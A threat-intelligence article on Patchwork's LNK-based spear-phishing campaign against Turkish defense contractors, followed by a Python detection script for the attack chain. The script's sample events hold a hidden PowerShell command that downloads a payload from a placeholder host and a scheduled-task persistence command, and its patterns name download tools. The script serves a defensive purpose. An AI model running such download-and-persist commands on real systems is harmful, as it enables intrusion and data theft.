Patchwork’s New Campaign Targeting Turkish Defense Contractors
Overview of the Threat
In a recent report from Arctic Wolf Labs, the hacking group known as Patchwork has been linked to a sophisticated spear-phishing effort aimed at Turkish defense contractors. This campaign appears strategically timed to coincide with growing defense partnerships between Turkey and Pakistan, amid ongoing military tensions between India and Pakistan.
The Mechanics of the Attack
The spear-phishing campaign uses a carefully orchestrated five-stage execution chain. The attackers send malicious LNK (Windows shortcut) files disguised as conference invitations to targets with an interest in unmanned vehicle systems. Opening such a file starts the first stage of the chain, which then proceeds to the remaining stages of compromise on the victim's system.
Geographic and Strategic Implications
Patchwork, also referred to as APT-C-09 or Dropping Elephant, is thought to have state sponsorship, likely originating from India. Historically active since 2009, this group has a history of targeting entities in China, Pakistan, and other South Asian countries. The current campaign effectively expands their geographic focus to include Turkish defense contractors, signaling a strategic interest in regions where defense cooperation is evolving.
Previous Activities and Evolving Strategies
Just a year prior, the Knownsec 404 Team revealed that Patchwork was targeting organizations connected to Bhutan, deploying the Brute Ratel C4 framework and updating a backdoor known as PGoShell. Since early 2025, the group has shifted its focus toward Chinese universities, leveraging themes associated with power grid management to deliver a Rust-based loader and employing a C# trojan named Protego to gather sensitive information from compromised systems.
Infrastructure Overlap with Other Threat Actors
Recent findings from QiAnXin, a Chinese cybersecurity firm, further indicate that Patchwork may share operational connections with the DoNot Team (APT-Q-38), hinting at collaborative efforts among various cyber threat actors.
Details of the Attack Chain
The spear-phishing strategy relies on malicious Windows shortcut files (LNK) delivered by email. These LNK files are crafted to execute PowerShell commands that download payloads from an attacker-controlled server whose domain is chosen to look authentic. One such domain, "expouav.org," was registered on June 25, 2025, and hosts a PDF intended to lure victims by mimicking an international conference on unmanned vehicle systems.
The Role of Deceptive Lures
The PDF serves as a visual distraction, allowing the attack to progress without the user’s knowledge. As Turkey commands a significant share of the global UAV export market and develops hypersonic missile technology, the targeting reflects a calculated effort to gain strategic intelligence during a period of heightened geopolitical tension.
Technical Evolution of Malware
Among the payloads downloaded during the attack is a malicious DLL, which is executed by DLL side-loading launched from a scheduled task. This stage ultimately leads to the deployment of shellcode that performs extensive reconnaissance on the infected host, including capturing screenshots and exfiltrating the collected data to the attacker's server.
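The chain described above (LNK opened from Explorer, PowerShell fetching a payload, a scheduled task pointing at a user-writable path, and a binary later launched from that path by the task scheduler) leaves a recognizable sequence in process-creation telemetry. The following Python is an added detection example and is not code from Arctic Wolf or any report on the campaign; the event format, the heuristic regexes, the stage names and all sample events (hostnames, paths, the `lure.example.invalid` URL) are constructed for illustration.

```python
"""Correlate Sysmon-style process-creation events into the multi-stage
LNK -> PowerShell download -> scheduled task -> side-load execution pattern.
Added detection example; field names and samples are constructed."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcEvent:
    ts: int             # constructed monotonic timestamp (seconds)
    host: str
    parent_image: str
    image: str
    command_line: str


# Directories a standard user can write to; tasks or binaries living here are suspect.
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp|AppData)\\", re.I)
# PowerShell download primitives commonly used by shortcut-launched loaders (heuristic, not exhaustive).
DOWNLOAD_CMDLET = re.compile(
    r"(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadFile|DownloadString|"
    r"Start-BitsTransfer|\bcurl\b|\bwget\b)", re.I)

# Stages must appear in this order on one host to raise an alert.
STAGES = ["lnk_powershell_download", "schtask_user_writable", "task_exec_user_writable"]


def classify(ev: ProcEvent) -> List[str]:
    """Tag a single event with the stage(s) it matches."""
    img, parent, cl = ev.image.lower(), ev.parent_image.lower(), ev.command_line
    tags = []
    # Stage 1: Explorer (the user double-clicking a .lnk) spawns PowerShell that downloads something.
    if img.endswith(("powershell.exe", "pwsh.exe")) and parent.endswith("explorer.exe") \
            and DOWNLOAD_CMDLET.search(cl):
        tags.append("lnk_powershell_download")
    # Stage 2: a scheduled task is created whose action lives in a user-writable directory.
    if img.endswith("schtasks.exe") and re.search(r"/create", cl, re.I) and USER_WRITABLE.search(cl):
        tags.append("schtask_user_writable")
    # Stage 3: the task scheduler runs a binary from a user-writable directory (side-load candidate).
    if parent.endswith(("svchost.exe", "taskeng.exe")) and USER_WRITABLE.search(ev.image):
        tags.append("task_exec_user_writable")
    return tags


def correlate(events: List[ProcEvent], window: int = 3600) -> Dict[str, List[str]]:
    """Return {host: matched stages} for hosts where all stages occur in order within `window`."""
    by_host: Dict[str, List[Tuple[int, str]]] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        for tag in classify(ev):
            by_host.setdefault(ev.host, []).append((ev.ts, tag))
    alerts: Dict[str, List[str]] = {}
    for host, seen in by_host.items():
        idx, first_ts, matched = 0, None, []
        for ts, tag in seen:
            if tag == STAGES[idx]:
                first_ts = ts if first_ts is None else first_ts
                if ts - first_ts <= window:
                    matched.append(tag)
                    idx += 1
                    if idx == len(STAGES):
                        break
        if idx == len(STAGES):
            alerts[host] = matched
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample telemetry: WS-01 shows the full chain, WS-02 shows benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent(100, "WS-01", r"C:\Windows\explorer.exe", PS,
              'powershell.exe -w hidden -c "iwr https://lure.example.invalid/p.bin -OutFile C:\\ProgramData\\u\\p.bin"'),
    ProcEvent(130, "WS-01", PS, r"C:\Windows\System32\schtasks.exe",
              "schtasks /create /tn Updater /tr C:\\ProgramData\\u\\legit.exe /sc minute /mo 5"),
    ProcEvent(400, "WS-01", r"C:\Windows\System32\svchost.exe", r"C:\ProgramData\u\legit.exe",
              "C:\\ProgramData\\u\\legit.exe"),
    ProcEvent(200, "WS-02", r"C:\Windows\explorer.exe", PS, "powershell.exe Get-Process"),
    ProcEvent(210, "WS-02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
              'schtasks /create /tn Backup /tr "C:\\Program Files\\Backup\\bk.exe" /sc daily'),
]

if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {' -> '.join(stages)}")
```

Each stage alone is noisy (administrators create scheduled tasks, and PowerShell downloads are common), which is why the alert fires only when the three stages appear in order on the same host within the window; tuning the user-writable path list and the download regex to the environment is the main knob.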
Advancements in Attack Capabilities
Arctic Wolf has identified a marked evolution in Patchwork's tooling, with a transition from x64 DLL variants to x86 PE executables. This shift points to an enhancement of their command-and-control structures and a sustained investment in operational development. It also reflects a broader diversification of attack methods, including more sophisticated command-and-control protocols that mimic legitimate websites.
Conclusion
As the geopolitical landscape shifts, the activities of threat actors like Patchwork underscore the need for heightened vigilance among defense contractors and other organizations operating within sensitive sectors. The ongoing adaptations in their cyber tactics emphasize the pressing importance of cybersecurity measures to safeguard against evolving threats.